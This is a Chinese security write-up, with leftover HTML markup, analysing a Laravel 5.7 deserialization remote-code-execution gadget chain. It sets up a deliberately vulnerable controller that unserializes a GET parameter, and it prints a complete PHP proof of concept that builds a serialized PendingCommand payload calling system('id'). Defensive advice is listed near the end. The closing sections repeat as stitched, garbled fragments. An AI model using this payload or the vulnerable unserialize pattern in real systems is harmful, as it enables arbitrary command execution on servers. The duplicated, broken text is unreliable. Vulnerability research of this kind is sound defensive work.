Laravel 5.7 反序列化漏洞RCE链挖掘与分析<\/h1>

漏洞概述<\/h2>
本文详细记录了Laravel 5.7框架中存在的反序列化漏洞远程代码执行(RCE)链的挖掘过程。该漏洞允许攻击者通过精心构造的序列化数据在目标系统上执行任意命令。<\/p>

漏洞环境搭建<\/h2>

使用composer安装Laravel 5.7框架：<\/p>

composer create-project laravel\/laravel laravel57 "5.7.*"<\/span>
<\/span><\/span>cd laravel57
<\/span><\/span>php artisan serve --host=<\/span>0.0.0.0
<\/span><\/span><\/code><\/pre><\/li>

在routes\/web.php<\/code>中添加路由：<\/p>
Route<\/span>::<\/span>get<\/span>("\/"<\/span>,"\App\Http\Controllers\DemoController@demo"<\/span>);
<\/span><\/span><\/code><\/pre><\/li>

创建DemoController.php<\/code>控制器：<\/p>
namespace<\/span> App\Http\Controllers<\/span>;
<\/span><\/span>use<\/span> Illuminate\Http\Request<\/span>;
<\/span><\/span>
<\/span><\/span>class<\/span> DemoController<\/span> extends<\/span> Controller<\/span> {
<\/span><\/span>    public<\/span> function<\/span> demo<\/span>() {
<\/span><\/span>        if<\/span>(isset<\/span>($_GET['c'<\/span>])) {
<\/span><\/span>            $code =<\/span> $_GET['c'<\/span>];
<\/span><\/span>            unserialize<\/span>($code);
<\/span><\/span>        } else<\/span> {
<\/span><\/span>            highlight_file<\/span>(__FILE__<\/span>);
<\/span><\/span>        }
<\/span><\/span>        return<\/span> "Welcome to laravel5.7"<\/span>;
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
漏洞链分析<\/h2>
关键执行点<\/h3>
漏洞利用链的核心位于Illuminate\/Foundation\/Testing\/PendingCommand<\/code>类的run<\/code>方法中，该方法在__destruct<\/code>魔术方法中被调用。<\/p>
利用链构造步骤<\/h3>


PendingCommand类<\/strong>：<\/p>

__destruct()<\/code>调用run()<\/code>方法<\/li>
run()<\/code>方法最终会执行命令<\/li>
<\/ul>
<\/li>

绕过mockConsoleOutput检查<\/strong>：<\/p>

mockConsoleOutput<\/code>方法中的$this->test->expectedQuestions<\/code>需要可控<\/li>
使用Faker\DefaultGenerator<\/code>类的__get<\/code>魔术方法来控制数据<\/li>
<\/ul>
<\/li>

控制命令执行<\/strong>：<\/p>

最终执行点：$this->app[Kernel::class]->call($this->command, $this->parameters)<\/code><\/li>
需要控制$this->app[Kernel::class]<\/code>返回的对象<\/li>
<\/ul>
<\/li>
<\/ol>
完整利用链<\/h3>

PendingCommand<\/code>对象被反序列化后触发__destruct<\/code><\/li>
__destruct<\/code>调用run<\/code>方法<\/li>
run<\/code>方法调用mockConsoleOutput<\/code><\/li>
mockConsoleOutput<\/code>通过__get<\/code>获取expectedQuestions<\/code><\/li>
最终执行$this->app[Kernel::class]->call<\/code>触发RCE<\/li>
<\/ol>
漏洞利用代码<\/h2>
<?<\/span>php<\/span>
<\/span><\/span>namespace<\/span> Illuminate\Foundation\Testing<\/span>{
<\/span><\/span>    class<\/span> PendingCommand<\/span>{
<\/span><\/span>        public<\/span> $test;
<\/span><\/span>        protected<\/span> $app;
<\/span><\/span>        protected<\/span> $command;
<\/span><\/span>        protected<\/span> $parameters;
<\/span><\/span>
<\/span><\/span>        public<\/span> function<\/span> __construct($test, $app, $command, $parameters) {
<\/span><\/span>            $this-><\/span>test<\/span> =<\/span> $test;
<\/span><\/span>            $this-><\/span>app<\/span> =<\/span> $app;
<\/span><\/span>            $this-><\/span>command<\/span> =<\/span> $command;
<\/span><\/span>            $this-><\/span>parameters<\/span> =<\/span> $parameters;
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> Faker<\/span>{
<\/span><\/span>    class<\/span> DefaultGenerator<\/span>{
<\/span><\/span>        protected<\/span> $default;
<\/span><\/span>
<\/span><\/span>        public<\/span> function<\/span> __construct($default =<\/span> null<\/span>) {
<\/span><\/span>            $this-><\/span>default<\/span> =<\/span> $default;
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> Illuminate\Foundation<\/span>{
<\/span><\/span>    class<\/span> Application<\/span>{
<\/span><\/span>        protected<\/span> $instances =<\/span> [];
<\/span><\/span>
<\/span><\/span>        public<\/span> function<\/span> __construct($instances =<\/span> []) {
<\/span><\/span>            $this-><\/span>instances<\/span>['Illuminate\Contracts\Console\Kernel'<\/span>] =<\/span> $instances;
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span>{
<\/span><\/span>    $defaultgenerator =<\/span> new<\/span> Faker\DefaultGenerator<\/span>(array<\/span>("1"<\/span> =><\/span> "1"<\/span>));
<\/span><\/span>    $app =<\/span> new<\/span> Illuminate\Foundation\Application<\/span>();
<\/span><\/span>    $application =<\/span> new<\/span> Illuminate\Foundation\Application<\/span>($app);
<\/span><\/span>    $pendingcommand =<\/span> new<\/span> Illuminate\Foundation\Testing\PendingCommand<\/span>($defaultgenerator, $application, 'system'<\/span>, array<\/span>('id'<\/span>));
<\/span><\/span>    echo<\/span> urlencode<\/span>(serialize<\/span>($pendingcommand));
<\/span><\/span>}
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>技术细节分析<\/h2>


Application类利用<\/strong>：<\/p>

$this->app[Kernel::class]<\/code>实际上是调用Illuminate\Foundation\Application<\/code>的offsetGet<\/code>方法<\/li>
通过控制$this->instances['Illuminate\Contracts\Console\Kernel']<\/code>可以返回任意对象<\/li>
<\/ul>
<\/li>

命令执行触发点<\/strong>：<\/p>

Illuminate\Foundation\Application<\/code>继承Container<\/code>的call<\/code>方法<\/li>
最终调用call_user_func_array<\/code>执行命令<\/li>
参数完全可控：call_user_func_array(可控数据,可控数据)<\/code><\/li>
<\/ul>
<\/li>
<\/ol>
防御措施<\/h2>

避免反序列化用户可控的数据<\/li>
升级到最新版本的Laravel框架<\/li>
对反序列化操作进行严格的白名单控制<\/li>
<\/ol>
总结<\/h2>
该漏洞展示了PHP反序列化漏洞中POP(Property-Oriented Programming)链的强大威力。通过精心构造对象属性链，攻击者可以触发框架深处的危险函数。挖掘此类漏洞需要对框架有深入理解，并能够追踪复杂的调用链。<\/p>

Laravel 5.7 反序列化漏洞RCE链挖掘与分析<\/h1>

漏洞概述<\/h2> 本文详细记录了Laravel 5.7框架中存在的反序列化漏洞远程代码执行(RCE)链的挖掘过程。该漏洞允许攻击者通过精心构造的序列化数据在目标系统上执行任意命令。<\/p>

漏洞链分析<\/h2>

关键执行点<\/h3> 漏洞利用链的核心位于Illuminate\/Foundation\/Testing\/PendingCommand<\/code>类的run<\/code>方法中，该方法在__destruct<\/code>魔术方法中被调用。<\/p>

总结<\/h2> 该漏洞展示了PHP反序列化漏洞中POP(Property-Oriented Programming)链的强大威力。通过精心构造对象属性链，攻击者可以触发框架深处的危险函数。挖掘此类漏洞需要对框架有深入理解，并能够追踪复杂的调用链。<\/p>

漏洞概述<\/h2>
本文详细记录了Laravel 5.7框架中存在的反序列化漏洞远程代码执行(RCE)链的挖掘过程。该漏洞允许攻击者通过精心构造的序列化数据在目标系统上执行任意命令。<\/p>

关键执行点<\/h3>
漏洞利用链的核心位于`Illuminate\/Foundation\/Testing\/PendingCommand<\/code>类的run<\/code>方法中，该方法在__destruct<\/code>魔术方法中被调用。<\/p>`

总结<\/h2>
该漏洞展示了PHP反序列化漏洞中POP(Property-Oriented Programming)链的强大威力。通过精心构造对象属性链，攻击者可以触发框架深处的危险函数。挖掘此类漏洞需要对框架有深入理解，并能够追踪复杂的调用链。<\/p>